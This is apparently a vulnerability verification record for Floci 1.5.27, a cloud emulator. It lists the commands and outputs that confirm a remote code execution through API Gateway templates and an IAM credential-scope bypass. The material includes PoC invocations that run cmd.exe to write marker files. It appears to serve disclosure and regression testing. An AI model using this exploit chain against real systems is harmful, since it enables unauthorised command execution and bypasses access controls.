Target: Floci 1.5.27
Original RCE commit analyzed: 238294e779d0cd24835ba04d7bb16b1e1fd15f76
Latest upstream commit rechecked for IAM bypass chain: 7efb280dbcf6f5ea8faab28f1c7d5f8c3f59b4e0

Original JUnit RCE command:
    .\mvnw.cmd '-Denforcer.skip=true' '-Dmaven.compiler.release=21' '-Dmaven.compiler.enablePreview=true' '-DargLine=--enable-preview' '-Dtest=ApiGatewayVtlRceExploitTest' test

Original JUnit RCE result:
    Tests run: 1, Failures: 0, Errors: 0, Skipped: 0
    target\apigw-vtl-rce-marker.txt => FLOCI_APIGW_VTL_RCE

Original standalone PoC command:
    python poc.py --host 127.0.0.1 --port 4566 --argv cmd.exe /c "echo FLOCI_STANDALONE_POC>C:/Temp/floci_standalone_poc.txt"

Original standalone PoC result:
    [+] REST API id: d1e873f2f8
    [+] Resource id: cfd975b9
    [+] Trigger response: {"ok":true,"exit":"0"}
    [+] Command executed by Floci process
    [+] Cleanup delete REST API: HTTP 202
    POC_EXIT=0
    MARKER_EXISTS=True
    C:\Temp\floci_standalone_poc.txt => FLOCI_STANDALONE_POC

IAM bypass regression command:
    .\mvnw.cmd -Dtest=ApiGatewayIamBypassRegressionTest test

IAM bypass regression result:
    Tests run: 1, Failures: 0, Errors: 0, Skipped: 0
    Correct apigateway credential scope was denied:
        HTTP 403
        IAM enforcement DENY: action=apigateway:POST
    Wrong iam credential scope was allowed with the same access key:
        Created REST API
        Created API Gateway resource
        Stored responseTemplates entry
        Created deployment and stage
        Executed /execute-api/{apiId}/prod/probe
        Observed template-controlled HTTP 207 response

Standalone wrong-scope bypass command shape:
    python poc.py --host 127.0.0.1 --port 4566 --bypass-iam --auth-access-key AKIAEXAMPLE --argv cmd.exe /c "echo FLOCI_BYPASS_CHAIN>C:/Temp/floci_bypass_chain.txt"